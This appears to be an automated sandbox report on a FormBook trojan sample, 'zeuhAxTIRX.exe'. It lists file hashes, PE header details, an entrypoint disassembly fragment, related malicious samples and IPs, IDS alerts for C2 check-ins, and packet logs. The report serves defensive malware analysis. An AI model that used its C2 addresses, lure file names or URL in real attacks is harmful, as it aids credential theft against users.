                                                                                                              PO#4500484210.exeGet hashmaliciousBrowse
                                                                                                              • www.needhamchannel.com/n58i/?DL3p=EMdaMwCajdhlyfQ2XpCCQ+dIoV6f4Opxt4QTrl2R+ALhmQYDBaXdRN6ddxWSg8qndCsj&5jo=7nWdFV7XH

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.comb2mb9ypaoG.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              HSBC Account Statement 03FEB2023_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              PO-2200230_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 3.127.73.216
                                                                                                              HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 18.193.36.153
                                                                                                              WcHjtoJIqg.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              E-FCR Docs_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 3.127.73.216
                                                                                                              8ClxEvJqX2.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              pre-orderX26.1.2023.xlsGet hashmaliciousBrowse
                                                                                                              • 3.127.73.216
                                                                                                              DHL Consigment_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 18.193.36.153
                                                                                                              HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              TNT Express eInvoice_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              HSBC Payment Advice_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              http://peoriafamilylaw.comGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              Ug2ICT5QWs.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185
                                                                                                              https://www.newameircanfunding.com/&d=DwMGaQGet hashmaliciousBrowse
                                                                                                              • 18.193.36.153
                                                                                                              lC9b8q1ep0KFW22 (1).exeGet hashmaliciousBrowse
                                                                                                              • 3.127.73.216
                                                                                                              0000swiftmessage.exeGet hashmaliciousBrowse
                                                                                                              • 3.127.73.216
                                                                                                              Dettagli della spedizione.exeGet hashmaliciousBrowse
                                                                                                              • 3.67.141.185

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              NOCIXUSYeni siparis listesi.exeGet hashmaliciousBrowse
                                                                                                              • 63.141.242.43
                                                                                                              Turkish Armed Forces.docGet hashmaliciousBrowse
                                                                                                              • 192.187.111.221
                                                                                                              sample_2.docGet hashmaliciousBrowse
                                                                                                              • 192.187.111.222
                                                                                                              vbc.exeGet hashmaliciousBrowse
                                                                                                              • 63.141.242.46
                                                                                                              doc2023013099877730091113.pdf.exeGet hashmaliciousBrowse
                                                                                                              • 63.141.242.43
                                                                                                              E-FCR Docs_pdf.exeGet hashmaliciousBrowse
                                                                                                              • 192.187.111.220
                                                                                                              PO#GAC260922023.exeGet hashmaliciousBrowse
                                                                                                              • 63.141.242.43
                                                                                                              SOA.exeGet hashmaliciousBrowse
                                                                                                              • 63.141.242.44
                                                                                                              Paid Invoices.exeGet hashmaliciousBrowse
                                                                                                              • 192.187.111.221
                                                                                                              MDCT091.jsGet hashmaliciousBrowse
                                                                                                              • 192.187.111.221
                                                                                                              SO# GOSUSNH1637860.exeGet hashmaliciousBrowse
                                                                                                              • 192.187.111.220
                                                                                                              xkfNsLQDaR.exeGet hashmaliciousBrowse
                                                                                                              • 63.141.242.46
                                                                                                              Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                              • 192.187.111.221
                                                                                                              SxK6y46tEd.exeGet hashmaliciousBrowse
                                                                                                              • 192.187.121.130
                                                                                                              ydbWyoxHsd.exeGet hashmaliciousBrowse
                                                                                                              • 63.141.242.43
                                                                                                              EVHXIU51J7Get hashmaliciousBrowse
                                                                                                              • 198.204.224.57
                                                                                                              PO00059564.xlsGet hashmaliciousBrowse
                                                                                                              • 142.54.187.21
                                                                                                              Readme.exeGet hashmaliciousBrowse
                                                                                                              • 192.187.111.221
                                                                                                              BATCH MCC220601.exeGet hashmaliciousBrowse
                                                                                                              • 192.187.121.130
                                                                                                              ILI1MGzcig.exeGet hashmaliciousBrowse
                                                                                                              • 74.91.21.2

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Temp\j-E8-1M

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):94208
                                                                                                              Entropy (8bit):1.2880737026424216
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                                                                              MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                                                                              SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                                                                              SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                                                                              SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.99334968669697
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              File name:zeuhAxTIRX.exe
                                                                                                              File size:186368
                                                                                                              MD5:271ae718b77b74826bb47fa7495eb565
                                                                                                              SHA1:45c8612d99bc2d05fb9cf42c1d84631c8e68b479
                                                                                                              SHA256:c0fd42b42f88ead8da8a49c472155197542576a4804fb270118292dfc5d40b77
                                                                                                              SHA512:fda1e69b4572abdf72907dc2f8c29a4495950e213baffab1b957a1e07e18a80ec3eb3c7baf8532bc8f3843976272353afeea46d0c86b27e9d46c7db1b78b50e4
                                                                                                              SSDEEP:3072:MVuepedbUYQvADcHsH9BgdjTsFQ3ij/ZgP/bVFKWT8D5fxA0PI4sSh6w95V:MVbedopvAAEBWO6gn5rPRsu
                                                                                                              TLSH:3204223152E18389CC38E6F34D1C3D7D36A88442A938B1161BF97299F3DB5687DACA50
                                                                                                              File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.........l..}...}...}.......}.......}.......}..Rich.}..................PE..L.....[E..........................................@........

                                                                                                              File Icon

                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4012e0
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x455BD5AF [Thu Nov 16 03:06:23 2006 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              sub esp, 000003E8h
                                                                                                              push 000003C4h
                                                                                                              lea eax, dword ptr [ebp-000003E4h]
                                                                                                              push 00000000h
                                                                                                              push eax
                                                                                                              mov dword ptr [ebp-000003E8h], 00000000h
                                                                                                              call 00007FDD2CC64B1Fh
                                                                                                              call 00007FDD2CC6563Ah
                                                                                                              xorps xmm0, xmm0
                                                                                                              movq qword ptr [ebp-12h], xmm0
                                                                                                              movq qword ptr [ebp-00000258h], xmm0
                                                                                                              mov dword ptr [ebp-000000C0h], eax
                                                                                                              movq qword ptr [ebp-00000268h], xmm0
                                                                                                              movq qword ptr [ebp-00000260h], xmm0
                                                                                                              mov dword ptr [ebp-1Ch], 9E1C187Dh
                                                                                                              mov dword ptr [ebp-18h], DC2BB132h
                                                                                                              movq xmm0, qword ptr [ebp-1Ch]
                                                                                                              mov dword ptr [ebp-0Ah], 00000000h
                                                                                                              mov eax, dword ptr [ebp-0Ch]
                                                                                                              mov dword ptr [ebp-00000258h], eax
                                                                                                              mov ax, word ptr [ebp-08h]
                                                                                                              movq qword ptr [ebp-00000268h], xmm0
                                                                                                              mov word ptr [ebp-14h], 006Eh
                                                                                                              movq xmm0, qword ptr [ebp-14h]
                                                                                                              mov word ptr [ebp-00000254h], ax
                                                                                                              xor eax, eax
                                                                                                              movq qword ptr [ebp-00000260h], xmm0
                                                                                                              xorps xmm0, xmm0
                                                                                                              movq qword ptr [ebp-38h], xmm0
                                                                                                              mov word ptr [ebp-34h], ax
                                                                                                              mov byte ptr [ebp-32h], al
                                                                                                              movq qword ptr [ebp-48h], xmm0
                                                                                                              movq qword ptr [ebp-40h], xmm0
                                                                                                              mov dword ptr [ebp-1Ch], 6E678F01h
                                                                                                              mov eax, dword ptr [ebp-1Ch]
                                                                                                              xor eax, 03FB0163h
                                                                                                              mov dword ptr [ebp-18h], 0000003Dh

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [C++] VS2012 build 50727
                                                                                                              • [ASM] VS2012 build 50727
                                                                                                              • [LNK] VS2012 build 50727

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x2d3d40x2d400False0.996336541781768data7.997908848134215IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                              Network Behavior

                                                                                                              Snort IDS Alerts

                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                              192.168.2.4199.59.243.22249711802031453 02/06/23-14:39:32.673954TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.4199.59.243.222
                                                                                                              192.168.2.4199.59.243.22249711802031449 02/06/23-14:39:32.673954TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.4199.59.243.222
                                                                                                              192.168.2.4199.59.243.22249711802031412 02/06/23-14:39:32.673954TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.4199.59.243.222

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Feb 6, 2023 14:38:20.717015028 CET4969580192.168.2.463.141.242.45
                                                                                                              Feb 6, 2023 14:38:20.853416920 CET804969563.141.242.45192.168.2.4
                                                                                                              Feb 6, 2023 14:38:20.853640079 CET4969580192.168.2.463.141.242.45
                                                                                                              Feb 6, 2023 14:38:20.853791952 CET4969580192.168.2.463.141.242.45
                                                                                                              Feb 6, 2023 14:38:20.990933895 CET804969563.141.242.45192.168.2.4
                                                                                                              Feb 6, 2023 14:38:21.002548933 CET804969563.141.242.45192.168.2.4
                                                                                                              Feb 6, 2023 14:38:21.002795935 CET804969563.141.242.45192.168.2.4
                                                                                                              Feb 6, 2023 14:38:21.003077030 CET4969580192.168.2.463.141.242.45
                                                                                                              Feb 6, 2023 14:38:21.005198956 CET4969580192.168.2.463.141.242.45
                                                                                                              Feb 6, 2023 14:38:21.141674995 CET804969563.141.242.45192.168.2.4
                                                                                                              Feb 6, 2023 14:38:31.065649986 CET4969680192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:31.083259106 CET8049696172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:31.086252928 CET4969680192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:31.086448908 CET4969680192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:31.103936911 CET8049696172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:31.336332083 CET8049696172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:31.336708069 CET8049696172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:31.336859941 CET4969680192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:32.598815918 CET4969680192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:33.614475012 CET4969780192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:33.631997108 CET8049697172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:33.632097960 CET4969780192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:33.632235050 CET4969780192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:33.649460077 CET8049697172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:33.877207041 CET8049697172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:33.877257109 CET8049697172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:33.877388954 CET4969780192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:33.877532005 CET4969780192.168.2.4172.67.156.58
                                                                                                              Feb 6, 2023 14:38:33.894751072 CET8049697172.67.156.58192.168.2.4
                                                                                                              Feb 6, 2023 14:38:38.983874083 CET4969880192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:39.050420046 CET804969887.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:39.050591946 CET4969880192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:39.050745964 CET4969880192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:39.117276907 CET804969887.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:39.139154911 CET804969887.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:39.139180899 CET804969887.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:39.139256001 CET4969880192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:40.552021980 CET4969880192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:41.568407059 CET4969980192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:41.634841919 CET804969987.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:41.635025978 CET4969980192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:41.635281086 CET4969980192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:41.701425076 CET804969987.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:41.724910975 CET804969987.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:41.724937916 CET804969987.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:41.725198030 CET4969980192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:41.725578070 CET4969980192.168.2.487.236.16.107
                                                                                                              Feb 6, 2023 14:38:41.791752100 CET804969987.236.16.107192.168.2.4
                                                                                                              Feb 6, 2023 14:38:46.776499987 CET4970080192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:46.800965071 CET8049700185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:46.801080942 CET4970080192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:46.801196098 CET4970080192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:46.825169086 CET8049700185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:46.911653996 CET8049700185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:46.911689043 CET8049700185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:46.911763906 CET4970080192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:48.302779913 CET4970080192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:49.318798065 CET4970180192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:49.343663931 CET8049701185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:49.343924046 CET4970180192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:49.344099998 CET4970180192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:49.368518114 CET8049701185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:49.411067009 CET8049701185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:49.411130905 CET8049701185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:49.411446095 CET4970180192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:49.411755085 CET4970180192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:49.708775043 CET4970180192.168.2.4185.215.4.36
                                                                                                              Feb 6, 2023 14:38:49.733059883 CET8049701185.215.4.36192.168.2.4
                                                                                                              Feb 6, 2023 14:38:56.814784050 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:56.981617928 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:56.981853008 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:56.982057095 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:57.148849964 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244018078 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244077921 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244131088 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244169950 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244204044 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244237900 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244271040 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244302034 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:57.244304895 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244343042 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244370937 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:57.244378090 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.244431973 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:57.410962105 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.411016941 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.411051035 CET8049702199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:57.411163092 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:57.411231041 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:58.490936041 CET4970280192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:59.542809963 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:59.709856987 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.710194111 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:59.710459948 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:59.879827976 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.995573044 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.995618105 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.995645046 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.995675087 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.995913982 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:59.995944977 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.995979071 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.995996952 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:59.996005058 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.996036053 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.996062040 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.996089935 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:38:59.996100903 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:59.996100903 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:38:59.996299982 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:39:00.165874004 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:39:00.166029930 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:39:00.166094065 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:39:00.166295052 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:39:00.166295052 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:39:00.166614056 CET4970380192.168.2.4199.192.28.121
                                                                                                              Feb 6, 2023 14:39:00.333518028 CET8049703199.192.28.121192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.208731890 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:05.375556946 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.377600908 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:05.377790928 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:05.544353008 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.677381039 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.677426100 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.677535057 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.677586079 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:05.677701950 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.677880049 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.677916050 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:05.678050995 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.678193092 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.678261995 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:05.678328037 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.678495884 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.678522110 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.678545952 CET8049704132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:05.678561926 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:05.678582907 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:05.678613901 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:06.889147043 CET4970480192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:07.898561954 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.065335035 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.065886974 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.065886974 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.232201099 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339430094 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339492083 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339524984 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339555979 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339586973 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339618921 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339648962 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339675903 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.339798927 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.340040922 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.349338055 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.349756002 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.349992037 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.506148100 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506194115 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506213903 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506233931 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506253958 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506273031 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506293058 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506311893 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506330013 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506406069 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.506485939 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.506563902 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.506622076 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.516287088 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.516321898 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.516546011 CET4970580192.168.2.4132.148.233.235
                                                                                                              Feb 6, 2023 14:39:08.672820091 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.672902107 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.672965050 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673023939 CET8049705132.148.233.235192.168.2.4
                                                                                                              Feb 6, 2023 14:39:08.673090935 CET8049705132.148.233.235192.168.2.4
